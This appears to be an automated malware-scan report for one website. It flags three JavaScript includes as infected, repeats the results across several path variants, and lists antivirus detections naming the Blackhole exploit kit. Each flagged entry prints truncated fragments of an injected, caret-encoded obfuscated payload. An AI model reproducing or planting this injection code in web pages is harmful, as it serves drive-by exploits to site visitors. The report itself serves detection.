Request | Server response | Status |
http://iwetechnology.com/ | 200 OK Content-Length: 9240 Content-Type: text/html | clean |
http://iwetechnology.com/./include/url.js | 200 OK Content-Length: 21183 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var CM_SESSION_KEY_KEY = "cmSessionKeyKey";
function getSessionPair(loc) {
return URL.getSessionPair(loc);
}
function getSessionHref() {
return URL.getSessionHref();
}
function processLinkz(doc) {
URL.processLinkz(doc);
}
function getSessionString() {
return URL.getSessionString();
}
function jdecode(s) {
return URL.jdecode(s);
}
function jencode(s) {
return URL.jencode(
... 3363 bytes are skipped ...1^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
/*/74ed9f*/
Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- Exploit.JS.CVE-2010-0806
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.eu
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Exploit-Blacole.eu
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/./include/swfobject.js | 200 OK Content-Length: 14210 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
if(typeof deconcept == "undefined") var deconcept = new Object();
if(typeof deconcept.util == "undefined") deconcept.util = new Object();
if(typeof deconcept.SWFObjectUtil == "undefined") deconcept.SWFObjectUtil = new Object();
deconcept.SWFObject = function(swf, id, w, h, ver, c, useExpressInstall, quality, xiRedirectUrl, redirectUrl, detectKey){
if (!document.getElementById) { return; }
this.DETECT_KEY = detectKey ? detectKey : 'detectflash';
this.skipDet
... 3220 bytes are skipped ...^86^8f^85^41^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/./include/sitetree.js | 200 OK Content-Length: 11259 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
if (typeof(decodeURIComponent) == 'undefined') {
decodeURIComponent = function(s) {
return unescape(s);
}
}
function jdecode(s) {
s = s.replace(/\+/g, "%20")
return decodeURIComponent(s);
}
var POS_NODENAME=0;
var POS_ID=1;
var POS_NAME=2;
var POS_NAVIGATIONTEXT=3;
var POS_HREF=4;
var POS_ISNAVIGATION=5;
var POS_CHILDS=6;
var POS_TEMPLATENAME=7;
var theSitetree=[
['
... 3272 bytes are skipped ...^86^8f^85^41^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/./6101.html | 200 OK Content-Length: 9240 Content-Type: text/html | clean |
http://iwetechnology.com/././include/url.js | 200 OK Content-Length: 21183 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var CM_SESSION_KEY_KEY = "cmSessionKeyKey";
function getSessionPair(loc) {
return URL.getSessionPair(loc);
}
function getSessionHref() {
return URL.getSessionHref();
}
function processLinkz(doc) {
URL.processLinkz(doc);
}
function getSessionString() {
return URL.getSessionString();
}
function jdecode(s) {
return URL.jdecode(s);
}
function jencode(s) {
return URL.jencode(
... 3363 bytes are skipped ...1^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
/*/74ed9f*/
Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- Exploit.JS.CVE-2010-0806
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.eu
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Exploit-Blacole.eu
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/././include/swfobject.js | 200 OK Content-Length: 14210 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
if(typeof deconcept == "undefined") var deconcept = new Object();
if(typeof deconcept.util == "undefined") deconcept.util = new Object();
if(typeof deconcept.SWFObjectUtil == "undefined") deconcept.SWFObjectUtil = new Object();
deconcept.SWFObject = function(swf, id, w, h, ver, c, useExpressInstall, quality, xiRedirectUrl, redirectUrl, detectKey){
if (!document.getElementById) { return; }
this.DETECT_KEY = detectKey ? detectKey : 'detectflash';
this.skipDet
... 3220 bytes are skipped ...^86^8f^85^41^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/././include/sitetree.js | 200 OK Content-Length: 11259 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
if (typeof(decodeURIComponent) == 'undefined') {
decodeURIComponent = function(s) {
return unescape(s);
}
}
function jdecode(s) {
s = s.replace(/\+/g, "%20")
return decodeURIComponent(s);
}
var POS_NODENAME=0;
var POS_ID=1;
var POS_NAME=2;
var POS_NAVIGATIONTEXT=3;
var POS_HREF=4;
var POS_ISNAVIGATION=5;
var POS_CHILDS=6;
var POS_TEMPLATENAME=7;
var theSitetree=[
['
... 3272 bytes are skipped ...^86^8f^85^41^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/././6101.html | 200 OK Content-Length: 9240 Content-Type: text/html | clean |
http://iwetechnology.com/./././include/url.js | 200 OK Content-Length: 21183 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var CM_SESSION_KEY_KEY = "cmSessionKeyKey";
function getSessionPair(loc) {
return URL.getSessionPair(loc);
}
function getSessionHref() {
return URL.getSessionHref();
}
function processLinkz(doc) {
URL.processLinkz(doc);
}
function getSessionString() {
return URL.getSessionString();
}
function jdecode(s) {
return URL.jdecode(s);
}
function jencode(s) {
return URL.jencode(
... 3363 bytes are skipped ...1^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
/*/74ed9f*/
Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- Exploit.JS.CVE-2010-0806
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.eu
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Exploit-Blacole.eu
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/./././include/swfobject.js | 200 OK Content-Length: 14210 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
if(typeof deconcept == "undefined") var deconcept = new Object();
if(typeof deconcept.util == "undefined") deconcept.util = new Object();
if(typeof deconcept.SWFObjectUtil == "undefined") deconcept.SWFObjectUtil = new Object();
deconcept.SWFObject = function(swf, id, w, h, ver, c, useExpressInstall, quality, xiRedirectUrl, redirectUrl, detectKey){
if (!document.getElementById) { return; }
this.DETECT_KEY = detectKey ? detectKey : 'detectflash';
this.skipDet
... 3220 bytes are skipped ...^86^8f^85^41^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/./././include/sitetree.js | 200 OK Content-Length: 11259 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
if (typeof(decodeURIComponent) == 'undefined') {
decodeURIComponent = function(s) {
return unescape(s);
}
}
function jdecode(s) {
s = s.replace(/\+/g, "%20")
return decodeURIComponent(s);
}
var POS_NODENAME=0;
var POS_ID=1;
var POS_NAME=2;
var POS_NAVIGATIONTEXT=3;
var POS_HREF=4;
var POS_ISNAVIGATION=5;
var POS_CHILDS=6;
var POS_TEMPLATENAME=7;
var theSitetree=[
['
... 3272 bytes are skipped ...^86^8f^85^41^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/./././6101.html | 200 OK Content-Length: 9240 Content-Type: text/html | clean |
http://iwetechnology.com/././././include/url.js | 200 OK Content-Length: 21183 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var CM_SESSION_KEY_KEY = "cmSessionKeyKey";
function getSessionPair(loc) {
return URL.getSessionPair(loc);
}
function getSessionHref() {
return URL.getSessionHref();
}
function processLinkz(doc) {
URL.processLinkz(doc);
}
function getSessionString() {
return URL.getSessionString();
}
function jdecode(s) {
return URL.jdecode(s);
}
function jencode(s) {
return URL.jencode(
... 3363 bytes are skipped ...1^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
/*/74ed9f*/
Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- Exploit.JS.CVE-2010-0806
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.eu
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Exploit-Blacole.eu
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://iwetechnology.com/././././include/swfobject.js | 200 OK Content-Length: 14210 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
if(typeof deconcept == "undefined") var deconcept = new Object();
if(typeof deconcept.util == "undefined") deconcept.util = new Object();
if(typeof deconcept.SWFObjectUtil == "undefined") deconcept.SWFObjectUtil = new Object();
deconcept.SWFObject = function(swf, id, w, h, ver, c, useExpressInstall, quality, xiRedirectUrl, redirectUrl, detectKey){
if (!document.getElementById) { return; }
this.DETECT_KEY = detectKey ? detectKey : 'detectflash';
this.skipDet
... 3220 bytes are skipped ...^86^8f^85^41^4a^41^4a^5c^2e^2b^9e^2e^2b^8a^87^41^49^8f^82^97^8a^88^82^95^90^93^4f^84^90^90^8c^8a^86^66^8f^82^83^8d^86^85^4a^2e^2b^9c^2e^2b^8a^87^49^68^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4a^5e^5e^56^56^4a^9c^9e^86^8d^94^86^9c^74^86^95^64^90^90^8c^8a^86^49^48^97^8a^94^8a^95^86^85^80^96^92^48^4d^41^48^56^56^48^4d^41^48^52^48^4d^41^48^50^48^4a^5c^2e^2b^2e^2b^84^89^93^51^5a^49^4a^5c^2e^2b^9e^2e^2b^9e".split(imerxq);vzvkf="";pqs("arCode");ljjn(""+vzvkf);}
Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Trojan:JS/Quidvetis.C
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|